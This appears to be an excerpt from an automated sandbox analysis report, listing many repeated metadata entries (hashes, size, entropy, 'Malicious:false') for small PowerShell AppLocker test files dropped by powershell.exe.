                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
